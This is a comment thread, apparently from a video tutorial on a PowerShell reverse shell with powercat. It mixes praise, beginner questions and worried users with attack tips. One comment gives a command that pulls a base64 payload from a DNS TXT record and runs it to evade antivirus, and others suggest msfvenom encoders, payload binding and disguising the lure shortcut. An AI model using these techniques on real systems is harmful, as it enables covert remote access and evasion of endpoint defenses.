So for hacking a PC you need to previously have access to that PC... Oooookayyyy... And to be on the same network... and to have Windows firewall allowing 1337 connections?? That's... just pretty specific situation no?
Bruh... Its the equivalent of being taught how to build a musket in a world where you can easily get an auto machine. Anydesk could do the same and more without setting off the anti virus.
I work in the IT-Sec area and can tell you that this is not about hacking, attacking or anything like that. Only the functionality of a reverse shell is shown here. 1. Any EDR or AV solution that says anything about itself would have prevented the download of the .ps1 file. 2. IEX commands, with a reference to an external address, would immediately be blocked by any EDR and AV solution. Even PowerShell v7 itself blocks this. 3. Although this is not a security mechanism, the PowerShell ExecutionPolicy would also intervene here and block the unsigned script. You have to be a little more imaginative. e.g. use base64 encoded script and work with -encodedcommand or use script blocks... It always works and I haven't seen an environment where it doesn't work: 1. Host a domain 2. Create TXT record with the base64 encoded script 3. Then make the target system run the following command: "powershell -enc (nslookup -q=txt example[.]com)[-1]" In this case, nslookup resolves the domain name and gets the TXT record entered from the domain. This TXT record contains the base64 encoded script and is passed to powershell. So far I have not seen any EDR or AV solution that blocked this.
@@SliderOverride I don't understand what's wrong with that. How do automated attacks work? One attempts to trick the victim's system into executing commands it is not supposed to. In most cases, this is done by downloading and executing ready-made code. The trick is to bypass all detection mechanisms and smuggle the code past them. In a real scenario, an attacker would only create code tailored to the victim in exceptional cases. In most cases, the code tends to be tailored to a vulnerability that fits many victims. An OnPrem Exchange Server is particularly popular here.
@@waldemarfocht1564 like start Teamviewer and enter Id haha. It's not hacking if someone creates self shortcut on their desktop to start download. The question is more how you get the icon on the user's desktop without his interaction Then you can also download other executable files and run it with a script on your computer that's not hacking
Gr8 video on how easy it is to access/control the winders remote host system. this shines such a bright light on c2c functionality vulnerabilities within winblows power shell. if only they all knew.......
Can you please share your thoughts and knowledge about Windows Sandbox. If using sandbox to open malware, virus or infected files, will this stop the "infection" to go out of the sandbox? Does is it protect for all kinds of threats? And, closing the sandbox, will this delete the infection, or it may stay in the system? Love your videos!!! Thanks a bunch!!
Can we perform it over WAN by like ssh tunneling and then specifying the tunnel's info instead of our so that the traffic will forward to our local host only
Only problem is that you need to get a user to download an application with malicious code, and also that code needs to not be detected by Windoes defender, which in this case, the powercat script is caught by Windows security and blocked from being downloaded.
Hey, i have a question, how do i check If I got ratted. I have done the cmd comman netstat/nbf and got some stuff that said (cant obtain ownership information). I checked the tcp under them and the location and they all seem to be pretty trustable. But i am still a bit worried.
Any decent antivirus respectively firewall should protect you against him being able to set it up like this. The real hacking is how to get that script on your computer in the first place. Unless you download it yourself it's not so easy.
Yes. Changing the output requires a post exploitation binary manipulation of the netstat program itself, which is not going to be easy but can be done. Also, these powershell hacks don't actually work unless windows defender is completely off and your firewall is down. This is more for proof of concept that remote code execution is feasible once you've leveraged an exploit.
Hey I wish you read my comment Can you tell us how to solve Erros in Kali Linux like if I typed a command and it didn't work because an error so how I find the solution to that error like is there a website or something like that like where I should go to find a solution for my error Because most of time when I search in Google or UA-cam I actually find nothing or find a solution but it doesn't work
Hello Sir, i just wanted my fb acc back. I no longer have acces to email and phone number. I even tried the one that u can send ur government id's but it won't go thru. I dont know what to do..i am just an ordinary people doesnt know about computer. Please help me..i watch ur reset any email episodes but dont know how to do it.
@@hereallweek Bios booting up?🤣 What No! I mean after when am Running windows interface .. like 30mins after boot up! Then you'll see Both the POWERSHELL and CMD. Make a Quick Pop up! Run a code and exit
Can be like for me running task from the provider of the computer, HP in exemple got task opening cmd for running Diag Utility. What you Can Do IS scan with MalwareByte and if nothing check with Autorun, from Microsoft SysInternal lab, too see whats going on when you boot, be carefull, only disable what you are sure too understand. And don't panic, like a Say, maybe a diag software from the pc provider, coule bé anything like Samsung Magic,HP diag, Realktek etc...
Master loi I truly admire and respect the skill that you have and the work you put in to getting there. I was wondering is there anyway that you can mentor me to make me a coder. The price doesn’t matter. I just want to Learn that trade and be swift with it. Please consider my humble request One more thing is there anyway that you can slow down just a little bit? Because I have to play your video at the slowest setting possible to be able understand
My Windows Defender catches powercat.ps1 when downloaded. Category: Backdoor Details: This program provides remote access to the computer it is installed on. How do you tackle this??
Learned more about this topic in 8 min of this video than in two lessons with my teacher... thanks for that.
Great power comes with great responsibility
- Yes LOI sir
This will not work if the target PC didn’t download that file
Add to your PowerShell command to startup chrome as well. Target runs your shortcut, lets you in still see the chrome window that they were expecting.
So for hacking a PC you need to previously have access to that PC... Oooookayyyy... And to be on the same network... and to have Windows firewall allowing 1337 connections?? That's... just pretty specific situation no?
Only for the 1337 h4x0rs
Just plug an USB in every computer you have access to.
Bruh... Its the equivalent of being taught how to build a musket in a world where you can easily get an auto machine. Anydesk could do the same and more without setting off the anti virus.
Have you ever heard name of social engineering techniques?😏
It helps you get into hacking very effectively!!!
Just found your channel and site, I cannot watch enough. Simply fantastic tutorials and rich explaination. 10/10
i don't understand using 'hacking' word when you have direct access to a target and set it up how you need to get access to it
Glad you said that becasue i wonder the same thing.. lol..
I work in the IT-Sec area and can tell you that this is not about hacking, attacking or anything like that. Only the functionality of a reverse shell is shown here.
1. Any EDR or AV solution that says anything about itself would have prevented the download of the .ps1 file.
2. IEX commands, with a reference to an external address, would immediately be blocked by any EDR and AV solution. Even PowerShell v7 itself blocks this.
3. Although this is not a security mechanism, the PowerShell ExecutionPolicy would also intervene here and block the unsigned script.
You have to be a little more imaginative.
e.g. use base64 encoded script and work with -encodedcommand or use script blocks...
It always works and I haven't seen an environment where it doesn't work:
1. Host a domain
2. Create TXT record with the base64 encoded script
3. Then make the target system run the following command: "powershell -enc (nslookup -q=txt example[.]com)[-1]"
In this case, nslookup resolves the domain name and gets the TXT record entered from the domain. This TXT record contains the base64 encoded script and is passed to powershell.
So far I have not seen any EDR or AV solution that blocked this.
To funny he calls that hacking by downloading the script and run the Script it's not Hacker Loi, it's hacker "LOL"
@@SliderOverride I don't understand what's wrong with that. How do automated attacks work? One attempts to trick the victim's system into executing commands it is not supposed to. In most cases, this is done by downloading and executing ready-made code. The trick is to bypass all detection mechanisms and smuggle the code past them.
In a real scenario, an attacker would only create code tailored to the victim in exceptional cases. In most cases, the code tends to be tailored to a vulnerability that fits many victims. An OnPrem Exchange Server is particularly popular here.
@@waldemarfocht1564 like start Teamviewer and enter Id haha.
It's not hacking if someone creates self shortcut on their desktop to start download. The question is more how you get the icon on the user's desktop without his interaction
Then you can also download other executable files and run it with a script on your computer that's not hacking
thats smart, does this still work?
@@testtest-ez3mp yeah it still works.
So interesting..i use only CMD for running Scripts against the target Machine thanks for that Video ! ❤️
plzz make a video on scada system
Gr8 video on how easy it is to access/control the winders remote host system. this shines such a bright light on c2c functionality vulnerabilities within winblows power shell. if only they all knew.......
thats all nice but what can we actaly do when we god the reverse shell
Can you please share your thoughts and knowledge about Windows Sandbox.
If using sandbox to open malware, virus or infected files, will this stop the "infection" to go out of the sandbox?
Does is it protect for all kinds of threats?
And, closing the sandbox, will this delete the infection, or it may stay in the system?
Love your videos!!!
Thanks a bunch!!
This look really nice, but could you do the same when you have av on, running defender and blocked using of IEX ? Like windows is normally working ?
Hello, I wish to learn cybersecurity and hacking at the same time, how can I go about it please. I have no knowledge about them
Wow. Very interesting stuff. Very educative
hello loiliang yang we want you to put vedio about the attiny 85 digispark
Can we perform it over WAN by like ssh tunneling and then specifying the tunnel's info instead of our so that the traffic will forward to our local host only
Hello sir, how remote access android with ip addres?
Hi 👋 mr loh I need your advice i have 12 yrs Experience in sales marketing I want to do career conversion cyber security are you able to advise me.
Tq sir..... it's hackers world...... form Anonymous.
LOVE💖💖💖💖from INDIA(ODISHA)
Only problem is that you need to get a user to download an application with malicious code, and also that code needs to not be detected by Windoes defender, which in this case, the powercat script is caught by Windows security and blocked from being downloaded.
daaamn, you best teacher hacker loi!!
Any video on how to stop someone from accessing your device?
Wow. This is some productive teaching shit
how I begin with hacking that I learn these type of things in details ?
Great, please make one video for automation with Excel
Good explanation.. By the way can you make tutorial "How To Exploit Pro Ftpd and Pure Ftpd with Metaslpoitable. Thanks before.
Window Defender: "Am i a joke".
Is any of this supposed to be surprising? Wow.. you're running powershell and downloading files. Crazy stuff.
I think the windwos defender is gonna pop up!!
Hello, Are you available to chat offline about a project?
Hey, i have a question, how do i check If I got ratted. I have done the cmd comman netstat/nbf and got some stuff that said (cant obtain ownership information). I checked the tcp under them and the location and they all seem to be pretty trustable. But i am still a bit worried.
Will any antivirus protect against this attack?
Any decent antivirus respectively firewall should protect you against him being able to set it up like this. The real hacking is how to get that script on your computer in the first place. Unless you download it yourself it's not so easy.
What about windows defender real-time protection if enabled ?
Doesn't work. You'll never get one of these powershell listeners to work on modern systems, not happening.
Are we using PowerShell from linux vm or Windows vm?
Mind to make a video on how to evade this kind of Attack? Or even remove this shell file from your PC? Incase you noticed you got fused ?
ok do not forget to turn on real time and the firewall
can it be possible that it doesnt work for me if i use a mobile hotspot as my internet?
Can you make a video about AWS Hacking, like AWSGOAT project
can you hack someone outside your network using this?
He said put on your black hat 😅😂
how to check our system is compromise or not.
Thanks alot for the tutorial very helpful
If you had something like this running on your system would it show up on the output of netstat ?
Yes. Changing the output requires a post exploitation binary manipulation of the netstat program itself, which is not going to be easy but can be done. Also, these powershell hacks don't actually work unless windows defender is completely off and your firewall is down. This is more for proof of concept that remote code execution is feasible once you've leveraged an exploit.
How to make spynote payload FUD?
How do you write on the screen?
Mr hacker Loi please do an iPhone reverse shell tutorial
You never disappoint us,
Always love your work 🙌🏻❤️
Hey I wish you read my comment
Can you tell us how to solve Erros in Kali Linux like if I typed a command and it didn't work because an error so how I find the solution to that error like is there a website or something like that like where I should go to find a solution for my error Because most of time when I search in Google or UA-cam I actually find nothing or find a solution but it doesn't work
Script kiddie: tries to install powercat.
Windows defender: Pipe down little fella.
Hello sir our company email address is getting spoffed please help me to fix this
Hello Sir, i just wanted my fb acc back. I no longer have acces to email and phone number. I even tried the one that u can send ur government id's but it won't go thru. I dont know what to do..i am just an ordinary people doesnt know about computer. Please help me..i watch ur reset any email episodes but dont know how to do it.
My system been hacked like this what can i do now, please help me
Ohhh! I think there's a malicious shell running on my PC because whenever I restart my PC I see a Quick she'll run a code and close.
Run only linux !
You’re most likely fine that’s your computers bios booting up
@@hereallweek Bios booting up?🤣 What No! I mean after when am Running windows interface .. like 30mins after boot up! Then you'll see Both the POWERSHELL and CMD. Make a Quick Pop up! Run a code and exit
@@eddybash1342 what'd you mean? Run only Linux?
Can be like for me running task from the provider of the computer, HP in exemple got task opening cmd for running Diag Utility.
What you Can Do IS scan with MalwareByte and if nothing check with Autorun, from Microsoft SysInternal lab, too see whats going on when you boot, be carefull, only disable what you are sure too understand.
And don't panic, like a Say, maybe a diag software from the pc provider, coule bé anything like Samsung Magic,HP diag, Realktek etc...
every time i try this on my main and dummy computer my dummy computer running windows says it cant connect to the remote server. plz help
How can I send shortcut file to any one. ??
The great power comes the great responsibility
I would like to buy hacking course
Bro you don’t need to “slow down” but pauses after periods and commas would be nice. Sounds like one run on sentence
sir please tell me how to create fund payload to bypass all av and crate it in .mp3 or .mp4 format. I need your help sir
Use FatRat
@@MrGeniusOfficial1 i use it but it not worker properly
For which platform you want to make payload?.. You can also bind it with any file using winrar
@@MrGeniusOfficial1 we never bypass windows defender
@@shibuadak7419 to Bypass defender u just need msfvenom dear and some knowledge of encoders in msfvenom or metasploit
I just happened to notice 13 different powershell apps has opened on my computer and trying to find solution. Any helps? Am i under attack?
that's why I disabled ability to run powershell for users
good job male, thanks!
thanks man you are great. you got a new subscriber :)
this is awesome i would like to be like you in the future .. :D
I turned around for literally 3 seconds and he had a server running.
Master loi
I truly admire and respect the skill that you have and the work you put in to getting there.
I was wondering is there anyway that you can mentor me to make me a coder. The price doesn’t matter. I just want to Learn that trade and be swift with it. Please consider my humble request One more thing is there anyway that you can slow down just a little bit? Because I have to play your video at the slowest setting possible to be able understand
When we are chatting on whatsapp are something like that...
Where are you, did you go to the moon? ❤️
Love your programme
Hey hacker Lili why is sometimes metasploit is not working
How
This works even with windows defender on?
it should
Please 🙏 make a tutorial about mobile Android hacking I'am so sad
He already had
Help me to know how to mod premium paid apps from Google playstore please 🙏🙏
This is just jakobys payloads ....
Interesting huh 🤔
He is not a hacker. Don’t trust him. He is pretending to be one. The TRUTH he is scamming people by taking their money.
Best of the best
Sir , this is not fair you didn't tell us the main thing ( you know lot more ways than this scriptkiddi attacks)
I'm here because of Uber :D
Dear sir make a video from wifi password cracked
and windows defender is a cucumber
Excelente Loi, como sempre muito bem explicado, continue com mais exemplos utilizando o powershell, são ótimos! Obrigado.
Hi my boss how to hack any sellfunel
That was confusing lol
Brother my gmail is hacked they changed every data please can you get it back please
What i do now explain please
Who can get it back my gmail plz
David Bombal's fans ????
love your videos aye
My Windows Defender catches powercat.ps1 when downloaded.
Category: Backdoor
Details: This program provides remote access to the computer it is installed on.
How do you tackle this??
Good video
yes..yes..perfect
But you speak very speedy
OMG ! I just do it. That's unbelievable 😶🌫😶🌫
In 3,2,1 boom
everything i do gets blocked by my antivirus lol so maybe we can't hack systems which have anti virus in it
bro can you hack a pc gamer and send it for me thank you 😃
My nigga is here
Sir I'm learning ur paid hacking udemy course for free.
please pardon me 😅🙏
Windows defender exist 🗿
Mmmmm. Power Hell. 😂